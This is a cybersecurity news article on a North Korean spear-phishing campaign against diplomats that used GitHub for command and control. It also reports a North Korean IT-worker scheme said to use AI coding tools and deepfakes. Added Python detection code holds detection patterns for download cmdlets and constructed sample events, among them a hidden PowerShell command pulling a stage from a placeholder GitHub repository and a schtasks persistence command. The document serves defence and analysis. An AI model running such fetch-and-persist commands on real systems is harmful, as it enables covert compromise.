North Korea Leverages GitHub for Diplomatic Cyber Attacks Amidst IT Worker Scheme Infiltrating Hundreds of Firms
- John Jordan
North Korean cyber actors have been implicated in a sophisticated espionage campaign targeting diplomatic missions, utilizing GitHub as a covert command-and-control channel. The attacks, which ran from March to July 2025, involved spear-phishing emails designed to trick embassy staff and foreign ministry personnel into downloading malicious files. This campaign highlights the evolving tactics of state-sponsored hacking groups.

Key Takeaways
- North Korean threat actors, likely Kimsuky, are using GitHub for cyber espionage against diplomatic targets.
- Spear-phishing emails impersonate trusted contacts, delivering malware via cloud storage services like Dropbox and Daum Cloud.
- The malware used is a variant of Xeno RAT, known as MoonPeak.
- The campaign shows operational similarities to Chinese APT groups, suggesting potential collaboration or influence.
- A separate North Korean scheme involves IT workers infiltrating companies, using AI tools and deepfakes to generate illicit revenue.
Diplomatic Espionage Campaign
The cyber espionage campaign saw North Korean threat actors send at least 19 spear-phishing emails. These emails were carefully crafted to impersonate trusted diplomatic contacts, offering convincing meeting invitations, official letters, and event details. The primary goal was to lure recipients into opening password-protected ZIP files hosted on cloud storage platforms such as Dropbox, Google Drive, and Daum Cloud.
Trellix researchers noted that GitHub, a platform typically used by developers, was leveraged as a covert command-and-control channel. The infection chains relied on trusted cloud storage solutions to deliver a variant of the Xeno RAT, dubbed MoonPeak, which grants attackers control over compromised systems. While the infrastructure and tactics overlap with known North Korean groups like Kimsuky, some indicators suggest potential involvement of China-based operatives.
The malicious ZIP archives contained Windows shortcut files (.LNK) disguised as PDF documents. Opening a shortcut ran PowerShell code that fetched further malware stages from GitHub and established persistence through scheduled tasks, while a decoy document was displayed to the victim to mask the activity. The malware also harvested system information and exfiltrated it to a private GitHub repository; by editing a text file in that repository the attackers could rotate payloads and deploy new malware to infected hosts.
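The chain above (shortcut wearing a document extension, PowerShell pulling stages from GitHub, persistence via a scheduled task) maps cleanly onto process- and file-creation telemetry. The following Python detector is an added example, not code from the article or from Trellix: it runs three rules over constructed sample events and reports whether every stage of the chain fired. The event schema, user paths, and the EXAMPLE-ORG/EXAMPLE-REPO names are placeholders, not indicators from the article; map the fields onto your own EDR or Sysmon process-creation and file-creation records.

```python
import re

# GitHub hosts commonly used to stage raw files (real domains). Repo names in the
# sample events are placeholders, not indicators from the article.
GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com", "gist.githubusercontent.com")
DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer)\b", re.I)
# A .lnk whose name ends in a document extension first, e.g. "agenda.pdf.lnk".
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)
POWERSHELL = ("powershell.exe", "pwsh.exe")


def rule_disguised_lnk(ev):
    """File-creation event for a shortcut disguised as a document."""
    return ev["type"] == "file_create" and bool(DOUBLE_EXT_LNK.search(ev["path"]))


def rule_powershell_github_fetch(ev):
    """PowerShell process whose command line downloads from a GitHub host."""
    if ev["type"] != "process" or ev["image"].lower() not in POWERSHELL:
        return False
    cmd = ev["cmdline"].lower()
    return any(host in cmd for host in GITHUB_HOSTS) and bool(DOWNLOAD_CMDLETS.search(cmd))


def rule_schtasks_from_powershell(ev):
    """schtasks.exe /create spawned by PowerShell: scripted persistence."""
    return (ev["type"] == "process"
            and ev["image"].lower() == "schtasks.exe"
            and "/create" in ev["cmdline"].lower()
            and ev["parent"].lower() in POWERSHELL)


RULES = {
    "disguised_lnk": rule_disguised_lnk,
    "powershell_github_fetch": rule_powershell_github_fetch,
    "schtasks_from_powershell": rule_schtasks_from_powershell,
}


def detect(events):
    """Return [(event_index, [names of rules that fired])] for matching events."""
    findings = []
    for i, ev in enumerate(events):
        hits = [name for name, rule in RULES.items() if rule(ev)]
        if hits:
            findings.append((i, hits))
    return findings


def chain_detected(findings):
    """True when every stage of the LNK -> GitHub fetch -> scheduled task chain fired."""
    fired = {name for _, hits in findings for name in hits}
    return fired == set(RULES)


# Constructed sample telemetry (not real logs). Events 3 and 4 are benign controls:
# a PDF reader opening a real PDF, and PowerShell running git against GitHub with
# no download cmdlet, which must not trigger the fetch rule.
SAMPLE_EVENTS = [
    {"type": "file_create",
     "path": "C:\\Users\\alice\\Downloads\\Invitation\\Meeting_Agenda.pdf.lnk"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -c "iwr '
                'https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage2.txt '
                '-OutFile $env:TEMP\\s2.ps1"'},
    {"type": "process", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 30 /tn "Updater" '
                '/tr "powershell -w hidden -f C:\\Users\\alice\\AppData\\Local\\Temp\\s2.ps1"'},
    {"type": "process", "parent": "explorer.exe", "image": "AcroRd32.exe",
     "cmdline": 'AcroRd32.exe "C:\\Users\\alice\\Downloads\\report.pdf"'},
    {"type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -c "git pull https://github.com/EXAMPLE-ORG/dev-tools"'},
]

if __name__ == "__main__":
    findings = detect(SAMPLE_EVENTS)
    for idx, hits in findings:
        print(f"event {idx}: {', '.join(hits)}")
    print("full chain observed:", chain_detected(findings))
```

Each rule on its own is noisy (developers do fetch from GitHub with PowerShell); the value is in correlating all three stages on one host within a short window, which is what `chain_detected` approximates here without timestamps. Because the text file the attackers rotate lives in a private repository, the URL alone will not tell you whether the content is malicious, so the detection keys on behaviour rather than on repository names.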
Links to China and IT Worker Scheme
Analysis of the attackers' activity revealed that a significant portion originated from a timezone consistent with China, with a smaller portion aligning with the Koreas. A notable pause in activity coincided with Chinese national holidays, further fueling speculation about Chinese involvement. This has led to several possibilities: North Korean operatives working from China, a Chinese APT mimicking Kimsuky, or a collaborative effort for intelligence gathering.
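Working-hours analysis of the kind described above can be reproduced on any timestamped activity (C2 check-ins, repository edits, phishing send times). The Python below is an added example, not Trellix's method or code: it takes constructed UTC timestamps, scores how well they fit an assumed 09:00 to 18:00 working day in each candidate timezone, and lists quiet weekdays in the candidate's local calendar so an analyst can compare them against public holiday calendars. The timestamps, the active-day pattern and the three-day gap are constructed, and the working-day window is an assumption.

```python
from datetime import datetime, timedelta, timezone

# Candidate UTC offsets to test the activity against (an assumption for this example).
CANDIDATES = {"UTC+8 (China)": 8, "UTC+9 (Koreas)": 9, "UTC+0": 0}
WORK_START, WORK_END = 9, 18  # assumed 09:00-18:00 local working day


def to_local(utc_times, offset_hours):
    """Convert timezone-aware UTC datetimes to a fixed-offset local time."""
    tz = timezone(timedelta(hours=offset_hours))
    return [t.astimezone(tz) for t in utc_times]


def working_hour_fraction(utc_times, offset_hours):
    """Share of events that fall inside the assumed working day at this offset."""
    hours = [t.hour for t in to_local(utc_times, offset_hours)]
    return sum(WORK_START <= h < WORK_END for h in hours) / len(hours)


def best_fit(utc_times, candidates=CANDIDATES):
    """Return (name of best-fitting candidate, {candidate: fraction}) for the activity."""
    scores = {name: working_hour_fraction(utc_times, off) for name, off in candidates.items()}
    return max(scores, key=scores.get), scores


def quiet_weekdays(utc_times, offset_hours, start, end):
    """Weekdays in [start, end] with no activity, using the candidate's local calendar.

    Weekends are skipped because they are quiet everywhere; a run of quiet weekdays
    that lines up with one country's holidays and not another's is the signal."""
    active = {t.date() for t in to_local(utc_times, offset_hours)}
    day, out = start, []
    while day <= end:
        if day.weekday() < 5 and day not in active:
            out.append(day)
        day += timedelta(days=1)
    return out


# Constructed activity: 20 events whose UTC hours sit at 01:00-09:59, spread over
# seven days of April 2025 with 4-6 April deliberately left empty.
UTC_HOURS = [1, 1, 2, 2, 3, 3, 4, 5, 6, 7, 8, 8, 9, 9, 9, 9, 2, 3, 5, 6]
ACTIVE_DAYS = [1, 2, 3, 7, 8, 9, 10]
SAMPLE_TIMES = [
    datetime(2025, 4, ACTIVE_DAYS[i % len(ACTIVE_DAYS)], h, 15, tzinfo=timezone.utc)
    for i, h in enumerate(UTC_HOURS)
]

if __name__ == "__main__":
    winner, scores = best_fit(SAMPLE_TIMES)
    for name, frac in scores.items():
        print(f"{name:15s} working-hour fit: {frac:.2f}")
    print("best fit:", winner)
    first, last = SAMPLE_TIMES[0].date(), max(t.date() for t in SAMPLE_TIMES)
    print("quiet weekdays (UTC+8):", quiet_weekdays(SAMPLE_TIMES, 8, first, last))
```

On this input UTC+8 scores a perfect fit while UTC+9 pushes the late-afternoon events past 18:00 and scores lower, and the only quiet weekday is Friday 4 April. Two caveats a practitioner would apply before reading this as attribution: one hour of offset separates the two candidates, so a shifted working day or a few late sessions flips the result, and timestamps an attacker controls (commit metadata, for example) can be set to whatever they like. The signal the article describes, hours plus a holiday-shaped pause, is stronger than either feature alone, and still only narrows the possibilities it lists.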
This campaign's disclosure coincides with findings from CrowdStrike, which identified over 320 incidents in the past year, a 220% increase from the previous year, in which North Koreans posed as remote IT workers to infiltrate companies and generate illicit revenue for the regime. This scheme, tracked as Famous Chollima and Jasper Sleet, reportedly uses generative AI coding assistants and deepfake technology to enhance operations and evade detection. These IT workers often hold multiple jobs simultaneously and recruit individuals to manage laptop farms for remote work, creating the appearance that the employees are located within the target countries.
As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.
Sources
North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms, The Hacker News.